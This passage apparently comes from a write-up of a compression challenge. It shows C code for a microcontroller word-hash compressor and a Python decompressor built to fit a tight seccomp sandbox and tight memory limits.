class="p">,</span> <span class="mi">35098</span><span class="p">,</span> <span class="mi">11101</span><span class="p">,</span> <span class="mi">49537</span><span class="p">,</span> <span class="mi">401</span><span class="p">,</span> <span class="mi">51258</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">64213</span><span class="p">,</span> <span class="mi">10636</span><span class="p">,</span> <span class="mi">4410</span><span class="p">,</span> <span class="mi">1945</span><span class="p">,</span> <span class="mi">10338</span><span class="p">,</span> <span class="mi">2786</span><span class="p">,</span> <span class="mi">42248</span><span class="p">,</span> <span class="mi">14110</span><span class="p">,</span> <span class="mi">9063</span><span class="p">,</span> <span class="mi">51277</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">1385</span><span class="p">,</span> <span class="mi">330</span><span class="p">};</span>
<span class="c1">// offsets applied to each character to get the asso_values index</span>
<span class="k">static</span> <span class="k">const</span> <span class="kt">int8_t</span> <span class="n">asso_offs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="o">-</span><span class="mi">23</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">36</span><span class="p">,</span> <span class="o">-</span><span class="mi">52</span><span class="p">,</span> <span class="o">-</span><span class="mi">46</span><span class="p">,</span> <span class="o">-</span><span class="mi">62</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">,</span> <span class="o">-</span><span class="mi">65</span><span class="p">};</span>
<span class="c1">// offset applied to the final character</span>
<span class="cp">#define asso_final_off (-65)
</span><span class="k">static</span> <span class="k">const</span> <span class="kt">uint8_t</span> <span class="n">leet_map</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="sc">'O'</span><span class="p">,</span> <span class="sc">'I'</span><span class="p">,</span> <span class="sc">'Z'</span><span class="p">,</span> <span class="sc">'E'</span><span class="p">,</span> <span class="sc">'A'</span><span class="p">,</span> <span class="sc">'S'</span><span class="p">,</span> <span class="sc">'G'</span><span class="p">,</span> <span class="sc">'T'</span><span class="p">,</span> <span class="sc">'B'</span> <span class="p">};</span>

<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">push_bits</span><span class="p">(</span><span class="n">uint24_t</span> <span class="n">x</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">nbits</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">while</span><span class="p">(</span><span class="n">nbits</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint8_t</span> <span class="n">cur</span> <span class="o">=</span> <span class="n">nbits</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="n">cur</span> <span class="o">&gt;</span> <span class="p">(</span><span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">))</span> <span class="p">{</span>
            <span class="n">cur</span> <span class="o">=</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">cur_byte</span> <span class="o">|=</span> <span class="p">((</span><span class="kt">uint8_t</span><span class="p">)</span><span class="n">x</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="n">cur_bit</span><span class="p">;</span>
        <span class="n">cur_bit</span> <span class="o">+=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">nbits</span> <span class="o">-=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="n">x</span> <span class="o">&gt;&gt;=</span> <span class="n">cur</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="n">cur_bit</span> <span class="o">==</span> <span class="mi">8</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">send_byte</span><span class="p">(</span><span class="n">cur_byte</span><span class="p">);</span>
            <span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
            <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">process_char</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">c</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">total_rx_count</span><span class="o">++</span><span class="p">;</span>
    <span class="k">if</span><span class="p">(</span><span class="n">is_tail</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// this could be more efficient (e.g. 6 bit or entropy encoding)</span>
        <span class="c1">// but we're only using it for at most 20 input characters</span>
        <span class="n">push_bits</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
        <span class="k">if</span><span class="p">(</span><span class="n">total_rx_count</span> <span class="o">==</span> <span class="mi">2048</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">push_bits</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">8</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">==</span> <span class="sc">' '</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span><span class="p">(</span><span class="n">total_rx_count</span> <span class="o">&gt;=</span> <span class="mi">2028</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">is_tail</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">cur_hash</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[</span><span class="n">last_char</span> <span class="o">+</span> <span class="n">asso_final_off</span><span class="p">];</span>
        <span class="n">push_bits</span><span class="p">(</span><span class="n">cur_hash</span><span class="p">,</span> <span class="mi">18</span><span class="p">);</span>
        <span class="k">if</span><span class="p">(</span><span class="n">leet_count</span><span class="p">)</span>
            <span class="n">push_bits</span><span class="p">(</span><span class="n">leet_bits</span><span class="p">,</span> <span class="n">leet_count</span><span class="p">);</span>

        <span class="n">word_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">last_char</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">cur_hash</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">leet_bits</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">leet_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="cm">/* regular word character */</span>
    <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">&gt;=</span> <span class="sc">'0'</span> <span class="o">&amp;&amp;</span> <span class="n">c</span> <span class="o">&lt;=</span> <span class="sc">'8'</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">c</span> <span class="o">=</span> <span class="n">leet_map</span><span class="p">[</span><span class="n">c</span> <span class="o">-</span> <span class="sc">'0'</span><span class="p">];</span>
        <span class="n">leet_bits</span> <span class="o">|=</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">leet_count</span><span class="p">);</span>
        <span class="n">leet_count</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="n">c</span> <span class="o">==</span> <span class="sc">'A'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'B'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'E'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'G'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'I'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'O'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'S'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'T'</span> <span class="o">||</span> <span class="n">c</span> <span class="o">==</span> <span class="sc">'Z'</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">leet_count</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span><span class="p">(</span><span class="n">word_len</span> <span class="o">&lt;=</span> <span class="mi">10</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">cur_hash</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[</span><span class="n">c</span> <span class="o">+</span> <span class="n">asso_offs</span><span class="p">[</span><span class="n">word_len</span><span class="p">]];</span>
    <span class="p">}</span>
    <span class="n">word_len</span><span class="o">++</span><span class="p">;</span>
    <span class="n">last_char</span> <span class="o">=</span> <span class="n">c</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">__interrupt</span><span class="p">()</span> <span class="n">main_irq</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span><span class="p">(</span><span class="n">PIR1bits</span><span class="p">.</span><span class="n">RCIF</span><span class="p">)</span> <span class="p">{</span>
        <span class="cm">/* rx interrupt */</span>
        <span class="kt">uint8_t</span> <span class="n">c</span> <span class="o">=</span> <span class="n">RCREG</span><span class="p">;</span>
        <span class="n">PIR1bits</span><span class="p">.</span><span class="n">RCIF</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
        <span class="n">process_char</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// globally enable interrupts</span>
    <span class="n">INTCONbits</span><span class="p">.</span><span class="n">GIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">INTCONbits</span><span class="p">.</span><span class="n">PEIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// configure uart and transmitter</span>
    <span class="n">TRISB</span> <span class="o">=</span> <span class="mh">0x06</span><span class="p">;</span>
    <span class="n">SPBRG</span> <span class="o">=</span> <span class="mi">32</span><span class="p">;</span>
    <span class="n">TXSTAbits</span><span class="p">.</span><span class="n">SYNC</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">RCSTAbits</span><span class="p">.</span><span class="n">SPEN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">TXSTAbits</span><span class="p">.</span><span class="n">TXEN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// configure uart receiver</span>
    <span class="n">PIE1bits</span><span class="p">.</span><span class="n">RCIE</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">RCSTAbits</span><span class="p">.</span><span class="n">CREN</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">while</span><span class="p">(</span><span class="o">!</span><span class="n">TXSTAbits</span><span class="p">.</span><span class="n">TRMT</span><span class="p">)</span>
            <span class="p">;</span>
        <span class="k">while</span><span class="p">(</span><span class="o">!</span><span class="n">txcnt</span><span class="p">)</span>
            <span class="p">;</span>
        <span class="n">TXREG</span> <span class="o">=</span> <span class="n">txbuf</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
        <span class="n">txcnt</span><span class="o">--</span><span class="p">;</span>
        <span class="k">for</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="n">txcnt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
            <span class="n">txbuf</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">txbuf</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">];</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>One feature to note is that we buffer and send bytes asynchronously, because we only send bytes upon receiving a space character and may output several bytes at once (up to 36 bits).</p>

<p>This is a very space-efficient compressor, using only 583 words of program memory (28.5%) and 51 bytes of RAM (22.8%). Here’s a sample compressed output corresponding to the sample input above (748 bytes); note that it’s a bit larger than predicted because we encode up to 21 bytes of trailing characters rather inefficiently:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>3877984a12693cb20b2b77c7e762860280bc84ef44aafde858752c9dce39bcf0e4c86cdac74d2bb1468988d1118c63d550165e8755454caa104b7b8e6adb991d4f351549d3ac77f4136f6c9b6740bf11081d258a21e8e1e9280125fd5e107a631df314e0b723b8d29e9ee609fb4330c066542f71b70742ee2a38610a6d0521291c8282269d7cc878028eece218c883bc987b1bad6e3dccbec98b3df8527f03e0aa0626385607af26b3b0230adde31e7bf90d180128a94a5d550035fa4cf5e4c99b910b1a7b76da874ca41a05fa132943a7d7df507b9e31f3330a736380750302a597a3f8dcd22dbeeb331b8c80e590ff202e374c51d960bb020b2d9895037c08704f8068216c472f50888de8d384064640847124da1fb78aa83c41384a1ab168e7e220e1dea20032b1c0ed148d4050d1563c6e618dcb8c1fe4ec9bebfb7e484b93a4b5aaa50b643e58e1e1989c0092117dface8aa2913720d31f2bc944bc4da22882cf2de3b3c5e0bd1a968da0447900dfc1a1e11ea9787c13506072a312abee9546b50927af86101c99f81b2f22d8012dacba093281ade5d0e18ea16f52cbaa87a7423e116986995222993c91c927cf50a542e2f2c01d45977e90bd3548e10156bcf4d2b9a8f69a346227c58bdc0e878c98e75066a6e221cd9f3118b8d3f7369c8857a4b5c9d1cc41de79962495c579092c101432cf81991cd2a1c36169172a701844c242c7f9fc6d6cb153e4221249026db5e09da72ecf0417c911292a94910cae855da54a0a14cab2353eb7b90a242f464551806b44be1723379c244f9a683e6e440823c73be876a83e7f2d13e506c06e4b870243081217c1c128b4cf3452fcf52131371a914301de7fa329bfaa22b77def64523e3ae0012e0e4a772697c785d9a4d2166dcc04d95bdc9800f2ccc1732e5a9d31c39e80a622882bc0de58690e38ac9b2600b49891e724688c749484aaa6ff67d8e9c81097bdf4fb1ceb132f979476d6480cdbc3b07edd2501291772370a1e4e3c731f8d571972c9448992ac629c66409c9ea890629c8e00
</code></pre></div></div>

<h2 id="the-decompressor">The Decompressor</h2>

<p>When I first devised this algorithm, I didn’t really think about the decompressor much; I figured it would be easy to implement since we get to write Python code. Little did I know this would end up being the hardest part of the challenge.</p>

<p>The decompression code is run using a small stub called <code class="language-plaintext highlighter-rouge">decomp_runner.py</code>, which looks like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="n">b64decode</span>
<span class="kn">import</span> <span class="nn">resource</span>
<span class="kn">import</span> <span class="nn">pyseccomp</span>


<span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">out</span><span class="p">):</span>
    <span class="k">exec</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="p">{</span><span class="s">'data'</span><span class="p">:</span> <span class="n">data</span><span class="p">,</span> <span class="s">'out'</span><span class="p">:</span> <span class="n">out</span><span class="p">})</span>


<span class="k">def</span> <span class="nf">sandbox</span><span class="p">():</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_CPU</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_FSIZE</span><span class="p">,</span> <span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">4096</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_AS</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">))</span>
    <span class="n">resource</span><span class="p">.</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">resource</span><span class="p">.</span><span class="n">RLIMIT_DATA</span><span class="p">,</span> <span class="p">(</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="mi">21</span><span class="p">))</span>

    <span class="nb">filter</span> <span class="o">=</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">SyscallFilter</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ERRNO</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">errno</span><span class="p">.</span><span class="n">EPERM</span><span class="p">))</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'write'</span><span class="p">,</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">Arg</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">pyseccomp</span><span class="p">.</span><span class="n">EQ</span><span class="p">,</span> <span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">fileno</span><span class="p">()))</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'exit_group'</span><span class="p">)</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">add_rule</span><span class="p">(</span><span class="n">pyseccomp</span><span class="p">.</span><span class="n">ALLOW</span><span class="p">,</span> <span class="s">'brk'</span><span class="p">)</span>
    <span class="nb">filter</span><span class="p">.</span><span class="n">load</span><span class="p">()</span>


<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span>

    <span class="n">prog</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]).</span><span class="n">decode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">)</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">b64decode</span><span class="p">(</span><span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
    <span class="n">out</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">([</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="mi">4096</span><span class="p">)</span>

    <span class="n">sandbox</span><span class="p">()</span>
    <span class="n">run</span><span class="p">(</span><span class="n">prog</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">out</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>Our decompressor code is passed as a base64 blob on the command-line, together with the compressor’s output. It installs tight CPU and memory limits (1 second CPU time, 2 MB memory size), then loads a very restrictive seccomp syscall filter which allows only <code class="language-plaintext highlighter-rouge">write(STDOUT_FILENO, ...)</code>, <code class="language-plaintext highlighter-rouge">exit_group</code> and <code class="language-plaintext highlighter-rouge">brk</code>. Finally, the provided code is launched with <code class="language-plaintext highlighter-rouge">exec</code>.</p>

<p>My first decoder attempt looked like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wordmap</span> <span class="o">=</span> <span class="p">{</span>
<span class="mi">11</span><span class="p">:</span> <span class="s">"MS"</span><span class="p">,</span>
<span class="mi">31</span><span class="p">:</span> <span class="s">"MN"</span><span class="p">,</span>
<span class="mi">41</span><span class="p">:</span> <span class="s">"ME"</span><span class="p">,</span>
<span class="mi">51</span><span class="p">:</span> <span class="s">"MR"</span><span class="p">,</span>
<span class="mi">100</span><span class="p">:</span> <span class="s">"GS"</span><span class="p">,</span>
<span class="mi">121</span><span class="p">:</span> <span class="s">"MI"</span><span class="p">,</span>
<span class="c1"># [snip] #
</span><span class="mi">194085</span><span class="p">:</span> <span class="s">"OLYMPIC"</span><span class="p">,</span>
<span class="mi">195863</span><span class="p">:</span> <span class="s">"NIGHTLIFE"</span><span class="p">,</span>
<span class="mi">203640</span><span class="p">:</span> <span class="s">"HOMEWORK"</span><span class="p">,</span>
<span class="mi">205457</span><span class="p">:</span> <span class="s">"NETWORK"</span><span class="p">,</span>
<span class="mi">206123</span><span class="p">:</span> <span class="s">"BRUNSWICK"</span><span class="p">,</span>
<span class="p">}</span>

<span class="n">leet_table</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">'A'</span><span class="p">:</span> <span class="s">'4'</span><span class="p">,</span>
    <span class="s">'B'</span><span class="p">:</span> <span class="s">'8'</span><span class="p">,</span>
    <span class="s">'E'</span><span class="p">:</span> <span class="s">'3'</span><span class="p">,</span>
    <span class="s">'G'</span><span class="p">:</span> <span class="s">'6'</span><span class="p">,</span>
    <span class="s">'I'</span><span class="p">:</span> <span class="s">'1'</span><span class="p">,</span>
    <span class="s">'O'</span><span class="p">:</span> <span class="s">'0'</span><span class="p">,</span>
    <span class="s">'S'</span><span class="p">:</span> <span class="s">'5'</span><span class="p">,</span>
    <span class="s">'T'</span><span class="p">:</span> <span class="s">'7'</span><span class="p">,</span>
    <span class="s">'Z'</span><span class="p">:</span> <span class="s">'2'</span>
<span class="p">}</span>

<span class="n">cur_byte</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span>

<span class="k">def</span> <span class="nf">readbits</span><span class="p">(</span><span class="n">n</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">cur_bit</span><span class="p">,</span> <span class="n">cur_byte</span>
    <span class="n">res</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="n">resbits</span> <span class="o">=</span> <span class="mi">0</span>
    <span class="k">while</span> <span class="n">resbits</span> <span class="o">&lt;</span> <span class="n">n</span><span class="p">:</span>
        <span class="n">chunk</span> <span class="o">=</span> <span class="n">n</span> <span class="o">-</span> <span class="n">resbits</span>
        <span class="k">if</span> <span class="n">chunk</span> <span class="o">&gt;</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span><span class="p">:</span>
            <span class="n">chunk</span> <span class="o">=</span> <span class="mi">8</span> <span class="o">-</span> <span class="n">cur_bit</span>
        <span class="n">t</span> <span class="o">=</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">cur_byte</span><span class="p">]</span> <span class="o">&gt;&gt;</span> <span class="n">cur_bit</span><span class="p">)</span> <span class="o">&amp;</span> <span class="p">((</span><span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">chunk</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">res</span> <span class="o">|=</span> <span class="n">t</span> <span class="o">&lt;&lt;</span> <span class="n">resbits</span>
        <span class="n">resbits</span> <span class="o">+=</span> <span class="n">chunk</span>
        <span class="n">cur_bit</span> <span class="o">+=</span> <span class="n">chunk</span>
        <span class="k">if</span> <span class="n">cur_bit</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span>
            <span class="n">cur_bit</span> <span class="o">=</span> <span class="mi">0</span>
            <span class="n">cur_byte</span> <span class="o">+=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">res</span>

<span class="n">output</span> <span class="o">=</span> <span class="s">""</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">2028</span><span class="p">:</span>
    <span class="n">word</span> <span class="o">=</span> <span class="n">wordmap</span><span class="p">[</span><span class="n">readbits</span><span class="p">(</span><span class="mi">18</span><span class="p">)]</span>
    <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">word</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">leet_table</span><span class="p">:</span>
            <span class="n">is_leet</span> <span class="o">=</span> <span class="n">readbits</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">is_leet</span><span class="p">:</span>
                <span class="n">output</span> <span class="o">+=</span> <span class="n">leet_table</span><span class="p">[</span><span class="n">c</span><span class="p">]</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">output</span> <span class="o">+=</span> <span class="n">c</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">output</span> <span class="o">+=</span> <span class="n">c</span>
    <span class="n">output</span> <span class="o">+=</span> <span class="s">" "</span>

<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">output</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">2048</span><span class="p">:</span>
    <span class="n">output</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">readbits</span><span class="p">(</span><span class="mi">8</span><span class="p">))</span>

<span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">output</span><span class="p">)</span>
<span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="n">flush</span><span class="p">()</span>
</code></pre></div></div>

<p>This worked great in preliminary testing, but failed entirely when run on the actual scoring system. The script was being passed as a base64 blob on the command line and was <em>exceeding the maximum length of a single command-line argument</em>. Some experimentation showed that the default maximum length was 128KB (131072 bytes) for a single argument, which translates into 96KB before base64 encoding. Thankfully, our raw wordlist is around 60KB, so my next attempt looked something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">wordlist</span> <span class="o">=</span> <span class="s">"""
THE
OF
AND
TO
A
[...]
CYLINDER
WITCH
BUCK
INDICATION
EH
"""</span><span class="p">.</span><span class="n">split</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">perfect_hash</span><span class="p">(</span><span class="n">w</span><span class="p">):</span>
  <span class="p">[...]</span>
<span class="n">wordmap</span> <span class="o">=</span> <span class="p">{</span><span class="n">perfect_hash</span><span class="p">(</span><span class="n">w</span><span class="p">):</span> <span class="n">w</span> <span class="k">for</span> <span class="n">w</span> <span class="ow">in</span> <span class="n">wordlist</span><span class="p">}</span>

<span class="p">[...]</span>
</code></pre></div></div>

<p>This runs, but immediately crashes before executing any code. Some debugging with <code class="language-plaintext highlighter-rouge">strace</code> revealed that Python was attempting to use the <code class="language-plaintext highlighter-rouge">sbrk</code> system call to allocate memory to compile the program (in particular, allocating space for the <code class="language-plaintext highlighter-rouge">wordlist</code> constant). Unfortunately, only the <code class="language-plaintext highlighter-rouge">brk</code> system call has been permitted through the filter, so Python’s attempt to allocate memory fails and it throws a <code class="language-plaintext highlighter-rouge">MemoryError</code> while compiling the code for <code class="language-plaintext highlighter-rouge">exec</code>.</p>

<p>This is much more serious than it initially appears. Without the ability to <code class="language-plaintext highlighter-rouge">sbrk</code> for additional memory, we’re effectively limited to only the free memory that was available before the seccomp filter was installed - and that small amount of memory has to be enough for both the compiled program and all of the variables it creates as it runs. Some experimentation suggests that we have around 120KB of free memory. Keep in mind that Python objects are quite heavyweight: per <code class="language-plaintext highlighter-rouge">.__sizeof__()</code>, a simple integer is 28 bytes in size, while a single-character string is 50 bytes, and both sizes are likely underestimates due to padding and malloc metadata. I also did not immediately see a way to convince Python to use <code class="language-plaintext highlighter-rouge">brk</code> instead of <code class="language-plaintext highlighter-rouge">sbrk</code> using pure Python code.</p>

<p>To get around this problem, I chose to <em>smuggle</em> the wordlist in a comment, which would not be compiled and would therefore not incur a significant memory cost. We can access the source code of our program, and thus the embedded wordlist, by walking the stack:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#THE,OF,AND,[...],BUCK,INDICATION,EH
</span><span class="k">try</span><span class="p">:</span>
    <span class="mi">1</span><span class="o">/</span><span class="mi">0</span>
<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
    <span class="n">prog</span> <span class="o">=</span> <span class="n">e</span><span class="p">.</span><span class="n">__traceback__</span><span class="p">.</span><span class="n">tb_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_locals</span><span class="p">[</span><span class="s">"prog"</span><span class="p">]</span>
</code></pre></div></div>

<p>However, we can’t even do something like <code class="language-plaintext highlighter-rouge">wordlist = prog.split("\n")[0].split(",")</code> due to the severe memory restrictions - 8192 strings will occupy at least 400KB (per <code class="language-plaintext highlighter-rouge">__sizeof__()</code>), far more than the 100KB we have available.</p>

<p>Instead, I took the approach of dynamically searching the wordlist for each incoming word. To avoid an expensive linear search (which would blow our CPU limit - 1 second), I sorted the wordlist by hash value, then implemented a binary search:</p>

